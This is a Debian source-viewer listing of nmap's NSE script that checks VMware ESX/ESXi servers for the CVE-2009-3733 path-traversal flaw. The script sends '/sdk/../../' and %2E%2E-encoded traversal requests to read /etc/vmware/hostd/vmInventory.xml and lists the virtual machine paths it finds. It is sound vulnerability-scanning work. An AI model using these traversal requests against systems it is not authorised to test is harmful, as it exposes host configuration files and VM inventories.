File: http-vmware-path-vuln.nse

package info (click to toggle)
nmap 7.95%2Bdfsg-3
  • links: PTS, VCS
  • area: main
  • in suites: trixie
  • size: 44,792 kB
  • sloc: cpp: 61,081; ansic: 30,771; python: 17,344; xml: 11,550; sh: 11,400; perl: 2,687; makefile: 996; java: 45; objc: 45
file content (141 lines) | stat: -rw-r--r-- 4,111 bytes parent folder | download | duplicates (7) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
 
local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"

description = [[
Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).

The vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).
]]

---
-- @usage
-- nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>
--
-- @output
-- | http-vmware-path-vuln:
-- |   VMWare path traversal (CVE-2009-3733): VULNERABLE
-- |     /vmware/Windows 2003/Windows 2003.vmx
-- |     /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx
-- |     /vmware/Pentest/Pentest - Windows/Windows 2003.vmx
-- |     /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx
-- |     /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx
-- |     /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx
-- |_    /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx
-----------------------------------------------------------------------

author = "Ron Bowes"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}


portrule = shortport.port_or_service({80, 443, 8222,8333}, {"http", "https"})

local function get_file(host, port, path)
  local file

  -- Replace spaces in the path with %20
  path = string.gsub(path, " ", "%%20")

  -- Try both ../ and %2E%2E/
  file = "/sdk/../../../../../../" .. path

  local result = http.get( host, port, file)
  if(result['status'] ~= 200 or result['content-length'] == 0) then
    file = "/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/" .. path
    result = http.get( host, port, file)

    if(result['status'] ~= 200 or result['content-length'] == 0) then
      return false, "Couldn't download file: " .. path
    end
  end

  return true, result.body, file
end

local function fake_xml_parse(str, tag)
  local result = {}
  local index, tag_start, tag_end

  -- Lowercase the 'body' we're searching
  local lc = string.lower(str)
  -- Lowercase the tag
  tag = string.lower(tag)

  -- This loop does some ugly pattern-based xml parsing
  index, tag_start = string.find(lc, "<" .. tag .. ">")
  while index do
    tag_end, index = string.find(lc, "</" .. tag .. ">", index)
    table.insert(result, string.sub(str, tag_start + 1, tag_end - 1)) -- note: not lowercase
    index, tag_start = string.find(lc, "<" .. tag .. ">", index)
  end

  return result
end

--local function parse_vmware_conf(str, field)
--  local index, value_start = string.find(str, field .. "[^\"]*")
--  if(not(index) or not(value_start)) then
--    return nil
--  end
--
--  local value_end = string.find(str, "\"", value_start + 1)
--  if(not(value_end)) then
--    return nil
--  end
--
--  return string.sub(str, value_start + 1, value_end - 1)
--end

local function go(host, port)
  local result, body
  local files

  -- Try to download the file
  result, body = get_file(host, port, "/etc/vmware/hostd/vmInventory.xml");
  -- It failed -- probably not vulnerable
  if(not(result)) then
    return false, "Couldn't download file: " .. body
  end

  -- Check if the file contains the proper XML
  if(string.find(string.lower(body), "configroot") == nil) then
    return false, "Server didn't return XML -- likely not vulnerable."
  end

  files = fake_xml_parse(body, "vmxcfgpath")

  if(#files == 0) then
    return true, {"No VMs appear to be installed"}
  end

  -- Process each of the .vmx files if verbosity is on
  --if(nmap.verbosity() > 1) then
  --  local result, file = get_file(host, port, files[1])
  --  io.write(nsedebug.tostr(file))
  --end

  return true, files
end

action = function(host, port)
  -- Try a standard ../ path
  local status, result = go(host, port)

  if(not(status)) then
    return nil
  end

  local response = {}
  table.insert(response, "VMWare path traversal (CVE-2009-3733): VULNERABLE")

  if(nmap.verbosity() > 1) then
    table.insert(response, result)
  end

  return stdnse.format_output(true, response)
end